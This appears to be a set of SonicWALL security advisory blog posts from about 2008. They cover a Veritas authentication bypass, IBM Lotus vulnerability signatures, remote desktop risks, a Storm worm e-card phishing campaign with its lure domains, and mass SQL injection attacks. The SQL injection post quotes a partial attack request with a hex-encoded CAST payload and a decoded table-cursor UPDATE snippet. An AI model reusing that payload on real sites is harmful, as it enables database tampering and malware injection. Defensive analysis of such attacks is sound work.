The Symantec Veritas Storage Foundation is a storage management suite. The product is composed of several services and agents. One of the services included in this suite is the Scheduler service which listens on TCP port 4888 by default. This is an RPC service with its own built in authentication mechanism.

The authentication mechanism in the Scheduler service utilizes the NT Lan Manager Security Support Provider (NTLM SSP) for security enforcement. The improper utilization of this component allows remote users to establish a NULL session with the service which effectively bypasses the authentication stage of the login procedure. This allows anonymous user logon to the affected service.

Exploitation of this vulnerability may allow anonymous malicious users to add, modify and delete snapshot schedules as well as potentionally run malicious code. SonicWALL has released an IPS signature to detect and block possible attack attempts targeting this vulnerability. The following signature covers this issue:

• (5204) Symantec Veritas SFW NTLMSSP Authentication Bypass PoC

IBM Lotus series products were very popular years ago, and they are still some clients’ favorite now. The products include Domino Web Server, Notes, Sametime Server/Client and so on.

Although the products are very useful to most of the clients, there are a lot of vulnerabilities in the products. For example, there was a HTTP Header Accept-Language Buffer Overflow vulnerability in IBM Lotus Domino Server products. Whenever a relatively long string following the Accept-Language header is sent to the server running products with the vulnerabilities, the stack buffer of the program will be overwritten, and the stack return addresses or exception handlers will be modified accordingly. This may allow an attack to inject and execute the malicious code.

SonicWALL UTM Research Team has spent quite long time researching and developing signatures for these vulnerabilities, and we are still doing the research continuously. Now we have 36 signatures related to these vulnerabilities, and they are listed below:

• 1044 IBM Lotus Sametime Server Multiplexer BO 1
• 1045 IBM Lotus Sametime Server Multiplexer BO 2
• 1393 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit
• 1397 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO PoC
• 1401 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit
• 1555 IBM Lotus Notes DOC Attachment Viewer BO PoC
• 1560 IBM Lotus Notes MIF Attachment Viewer BO Attempt 1
• 1561 IBM Lotus Notes MIF Attachment Viewer BO Attempt 2
• 1562 IBM Lotus Notes MIF Attachment Viewer BO Attempt 3
• 1563 IBM Lotus Notes MIF Attachment Viewer BO Attempt 4
• 1566 IBM Lotus Notes MIF Attachment Viewer BO Attempt 5
• 1567 IBM Lotus Notes MIF Attachment Viewer BO Attempt 6
• 1568 IBM Lotus Notes HTML Message Handling BO PoC 1
• 1582 IBM Lotus Notes HTML Message Handling BO PoC 2
• 2015 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 1
• 2016 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 2
• 2017 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 3
• 2026 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 4
• 3121 Lotus Domino Server 7.0 Denial of Service
• 4025 IBM Lotus Domino LDAP Server Memory Exception PoC
• 4026 IBM Lotus Notes HTML Speed Reader Long URL BO Attempt
• 4327 IBM Lotus Notes UUE File Handling BO PoC
• 4351 IBM Lotus Domino LDAP Invalid DN BO PoC
• 4352 IBM Lotus Domino LDAP Invalid DN BO PoC 2
• 4436 IBM Lotus Domino Web Access Message Handling DoS
• 4438 IBM Lotus Domino Web Service DoS PoC
• 4439 IBM Lotus Notes Cross Site Scripting PoC
• 4463 Lotus Notes URI Handler Argument Injection PoC
• 4563 IBM Lotus Notes Cross Site Scripting PoC 2
• 4666 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit 2
• 4779 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit 2
• 4940 IBM Lotus Notes Applix Graphics Parsing BO PoC
• 4984 IBM Lotus Notes WPD Attachment BO PoC
• 5027 IBM Lotus Domino Web Server HTTP Header BO PoC
• 5157 IBM Lotus 1-2-3 Work Sheet File Viewer BO PoC
• 5192 IBM Lotus Domino Accept-Language BO

These signatures have well protected the SonicWALL clients from being attacked, and the following statistics show last 2 months of attack attempts blocked by SonicWALL.

Remote desktop software is software which allows graphical applications to be run remotely on a server, while being displayed locally. The remote desktop software consists of two separate computer programs, a “host version” that is installed on the computer to be controlled, and a “client version” that is installed on the controlling computer.

Remote desktop software can be divided into two categories. The first group doesn’t have a centralized server — host version software and client version software finds each other directly. Examples of this type of software include Microsoft Remote Desktop Connection and software use the VNC protocol. When host version software and client version software sit in the same network they work pretty well. However, in the scenario client version software and host version software sit in different networks, for example, a home network and a corporate network, setting up the connection could be tricky.

The second group of remote desktop software uses a centralized server to track active peers. When host version software starts, it signs in to the centralized server; the centralized server will assign a temporary ID to the machine. By providing the temporary ID to the centralized server, client version software gets necessary information of the machine it tries to connect. Host version software and client version software then try to connect to each other, either directly or through the centralized server. Examples of this type of software include GoToMyPC and TeamViewer. Typically this type of software provides great functionality to bypass firewalls.

Remote desktop software is made to increase computer users’ productivity. However, misusing the software could bring up security issues. Therefore some companies have policies that disallow the usage of remote desktop software from external networks.

Aug 6, 2008

A new wave of e-mails was discovered with following subjects:

• You Have An Ecard
• A card for you
• Someone sent you an Ecard.
• Your Digital Greeting Card is waiting

They are pointing to the following domains:

• bestlettercard.com
• supergreetingcard.com
• freepostcardonline.com
• worldpostcardart.com
• superlettercard.com
• digitalaudiopostcard.com
• audiopostcardmail.com
• lettercardadvertising.com
• yourlettercard.com
• oldpostcardshop.com

Here are a few examples of such e-mails:

The email contains a fake message claiming your neighbor or flatmate has sent you a greeting card along with a link. If the user clicks on the link , it opens up a page and prompts the user to download postcard.exe file which is the new variant of Storm worm.

SonicWALL detects this new wave with following signatures:

GAV: Zhelatin.ZN_13 (Worm)

In the recent few weeks, a lot of SQL Injection attacks appeared on the Internet. These attacks use vulnerable ASP or PHP code to inject malicious SQL into the target database server. Furthermore, some SQL Injection Attack Tools have been developed and released on the Internet. The tools can query the Internet search engine such as Google, to find the ASP/PHP pages as the candidate targets. Then, the malicious SQL codes are injected into the target web pages. The attack may affect the database directly, or even the users who visit the infected pages. Danmec/Asprox SQL Injection Attack Tool is a good example.

The main method of these SQL Injections is to send the following HTTP request to the target:

GET /page.asp?id=xx;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500200040
00540020007600610072006300680061007200280032003500
350029002C0040004300200076006100720063006800610072
002800320035003500290020004400450043004C0041005200
4500200www.example.com HTTP/1.1

The contents within the CAST function are the hexadecimal value of the SQL sentences, and they may vary. One example of the malicious codes is listed below:

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(‘UPDATE [‘+@T+’] SET

In response to these attacks, SonicWALL UTM team has created the following IPS signatures:

• 1062 DECLARE CURSOR EXEC Attempt (Highly Possible SQL Injection)
• 1092 CAST EXEC Attempt (Possible SQL Injection)
• 1445 DECLARE CAST EXEC Attempt (Highly Possible SQL Injection)
• 1074 DECLARE CAST EXEC Attempt 2 (Highly Possible SQL Injection)
• 1079 DECLARE CAST EXEC Attempt 3 (Highly Possible SQL Injection)
• 1080 DECLARE CAST EXEC Attempt 4 (Highly Possible SQL Injection)
• 1111 DECLARE CAST DECLARE Attempt 1 (Possible SQL Injection)
• 1112 DECLARE CAST DECLARE Attempt 2 (Possible SQL Injection)
• 1113 DECLARE CAST DECLARE Attempt 3 (Possible SQL Injection)
• 1114 DECLARE CAST DECLARE Attempt 4 (Possible SQL Injection)
• 3336 SQL Inject Attack Attempt

These signatures will detect most of the attack cases described above. The following figure shows us the SQL Injection Attack activities within the last two months.

From the figure we can clearly find that these attacks began at the end of June, and they are still going. The SonicWALL UTM team will continue monitoring the attacks, and release up-to-date information about these SQL Injection Attacks.